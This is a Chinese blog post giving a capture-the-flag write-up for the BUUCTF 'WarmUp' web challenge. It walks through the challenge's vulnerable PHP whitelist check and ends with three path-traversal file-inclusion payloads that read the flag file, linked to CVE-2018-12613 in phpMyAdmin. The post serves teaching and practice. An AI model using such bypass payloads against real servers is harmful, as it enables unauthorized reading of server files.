BUUCTF web WarmUp

最新推荐文章于 2022-03-31 10:27:22 发布
最新推荐文章于 2022-03-31 10:27:22 发布
阅读量343 收藏 1
点赞数
分类专栏: ctf 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38642804/article/details/106493920
版权

CTF记事本,杂且多
打开页面,查看源代码

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
</head>
<body>
    <!--source.php-->
    
    <br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>

发现source.php,打开发现源码

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

很好,代码审计,一点儿也不nic。
发现hint.php,进去看到

flag在ffffllllaaaagggg中,看了眼代码,很弱看不懂,百度大法,发现神仙博文小白也可以看懂的漏洞分析(CVE-2018-12613),小白真的可以看懂,感天动地。
读过之后分析这道题,白名单验证,文件包含,file传参。
要执行file,需要满足if里面三个条件

if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    )
  1. ! empty($_REQUEST[‘file’] 传入的file值不能为空
  2. is_string($_REQUEST[‘file’] file字段的值必须是字符串
  3. emmm::checkFile($_REQUEST[‘file’] ) 此函数是emmm类的一个静态方法,会对file的传参进行检查。

接下来分析emmm类,首先给出白名单内容,之后有4个if判断。

  1. if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; }
    判断page是否为空并且为字符串类型
if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );

判断file值是否在白名单,如果不在执行page。

mb_strpos():返回要查找的字符串在别一个字符串中首次出现的位置

php mb_strpos()函数详解

in_array() 函数搜索数组中是否存在指定的值。

mb_substr() 函数返回字符串的一部分

PHP mb_substr() 函数

page该段代码会截取传参之前的内容,?后的传参会被截取。然后将截取到的文件名与白名单进行匹配,也就是判断3执行的内容。如果匹配成功返回true,匹配失败接着对file的值进行处理,会执行下面的代码。

if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')

该段代码会对file的值进行URL解码,然后对解码后的内容截取?传参之前的内容。在将截取到的内容与白名单进行匹配,执行判断4的内容。

分析后开始构造payload,原题的意思前面的博文中见的很详细,因为urldecode函数,需要将?进行url编码成%3f。%25是%的URL编码,最后是%253f。很迷的是这道题好像下面的判断没有生效,用下面三个payload都可以出来flag…

?file=source.php?../../../../../ffffllllaaaagggg

?file=source.php%3f../../../../../ffffllllaaaagggg

?file=source.php%253f../../../../../ffffllllaaaagggg

在这里插入图片描述

初级飞行员
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF攻防世界warmup
daqiangdetianxia的博客
07-24 304
查看源代码,发现source.php 进去source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//可以发现有hint.php
TensorFlow Serving API设置warmup
01-07
运行后附代码文件生成tf_serving_warmup_requests文件; 置其于模型保存文件夹内的assets.extra文件夹下; 重启docker API即可,可观察到屏幕输出显示warmp启动成功; 保存模型的文件结构于是乎成为: . ├── ...
php代码审计题目总结
qq_45927819的博客
12-14 1676
<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page))//判断.
buuctf -- warm up(远程文件包含漏洞)
qq_46485934的博客
09-25 1598
一.source.php 点开页面,是一个滑稽的表情。当然老规矩,右键审查页面源代码 发现了哥source.php,于是访问一下。 source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
buuctf web warmup详细题解
weixin_64160292的博客
03-31 3074
题目:warmup 题目来源:buuctf 分析过程: 1. 首先ctrl + u 查看源代码,我们发现有一个source.php文件 2. 我们打开source.php文件,是一段代码,这道题要我们代码审计。 3. 与source文件相似的hint.php文件我们也打开看一下,它说flag在ffffllllaaaagggg中。 正在上传… 4. 然后回来source.php看这段代码,通过上网查询关于php的函数的用法。然后审计代码得出,...
今日头条杯2018湖北省赛 F.flower road
qq_41037114的博客
05-09 401
链接:https://www.nowcoder.com/acm/contest/104/E来源:牛客网时间限制:C/C++ 3秒,其他语言6秒空间限制:C/C++ 262144K,其他语言524288K 64bit IO Format: %lld题目描述 (受限于评测机,此题数据范围与现场赛不一致,请谅解) Once upon a time, there was a beautif...
SharePoint Warm up WSP包
05-10
SharePoint Warm up WSP包是一种专门针对SharePoint环境优化启动速度的解决方案。在SharePoint环境中,初次访问或者长时间未访问的网站集可能会因为缓存、IIS应用程序池回收等因素导致加载速度较慢。这种现象通常被...
WarmUp
03-26
在IT行业中,尤其是在Web开发领域,"WarmUp"通常指的是预热或准备阶段,这可能涉及到服务器、应用程序或特定功能的初始化。在这个场景下,"WarmUp"可能是指优化CSS(Cascading Style Sheets)性能的过程,确保网页...
TICs-WarmUp
03-29
项目通过GitHub克隆获取,仓库名为"TICs-WarmUp",提供了实践操作的代码示例。下面将详细解释这个教程的主要内容和相关知识点。 首先,克隆仓库是软件开发中的常见操作,用于获取远程存储库的本地副本。在本案例中...
Proyecto-Warmup
03-18
标题“Proyecto-Warmup”很可能是一个Java项目的名字,它可能是为了热身或者初始化某个复杂的开发任务而设计的。在Java编程中,"Warmup"通常指的是预热过程,这可能涉及到启动应用、加载必要的数据结构或进行性能...
composer-warmup
05-27
OpCode Warmer(composer插件) 通过预热OpCode优化您的应用... recommendedopcache.file_update_protection =0用法$ cd my-project$ composer warmup-opcode它是如何工作的? 从PHP 7.0开始,OpCache扩展能够将编译
decimal_warmup
06-06
本主题聚焦于一个特定的编程任务——“decimal_warmup”,这是一个关于十进制到二进制转换的练习。在JavaScript中,理解并掌握数字的进制转换对于提升编程技能至关重要。 首先,我们要了解十进制(Decimal)和二...
neo_warmup:热身 Neo4j
06-05
构建它: mvn clean package将 target/warmup-1.0.jar 复制到 Neo4j 服务器的 plugins/ 目录中。 通过在 conf/neo4j-server.properties 中添加一行来配置 Neo4j: org.neo4j.server.thirdparty_jaxrs_classes=...
COMP353WarmUp
04-19
目标是创建一个与MySQL数据库通信的简单Web界面 课程:2021年冬季的COMP 353 依存关系 PHP 作曲家 视窗 下载XAMPP的安装程序 获取XAMPP的安装程序: : 下载Composer的安装程序 获取Composer的安装程序: : 配置...
warmup-challenge
03-26
Create React App入门该项目是通过引导的。可用脚本在项目目录中,可以运行:yarn start 在开发模式下运行该应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何棉绒...
文件包含、文件上传漏洞
CyhDl666的博客
01-28 1650
文章目录文件包含漏洞1.[HCTF 2018]WarmUp2.[ACTF2020 新生赛]Include3.[极客大挑战 2019]Secret File4.[BJDCTF2020]ZJCTF 不过如此 文件包含漏洞 不多说了 直接做题 1.[HCTF 2018]WarmUp F12进入source.php文件 <?php highlight_file(__FILE__); class emmm { public static function che
CVE-2018-12613复现
0xdawn的博客
01-31 4600
0x00 漏洞描述 ​ 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ ...
hctf-web-warmup
wyj_1216 House
02-04 424
题目 writeup 查看页面源代码 发现source.php 得到部分代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"...
WEB_HCTF_2018_WarmUp
Pz_mstr's Blog
03-06 647
Categories web-代码审计 write up source code get source code http://eb22847d-9f8a-4ecf-b972-5ecebfcf5faf.node3.buuoj.cn/source.php <?php highlight_file(__FILE__); class emmm { publi...
pytorch warmup
最新发布
07-27
PyTorch的warmup是指在训练神经网络时,初始学习率较小,然后逐渐增加到设定的学习率。这个过程可以帮助网络更好地收敛并提高训练效果。在PyTorch中,可以使用pytorch-gradual-warmup-lr库来实现warmup功能。这个库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值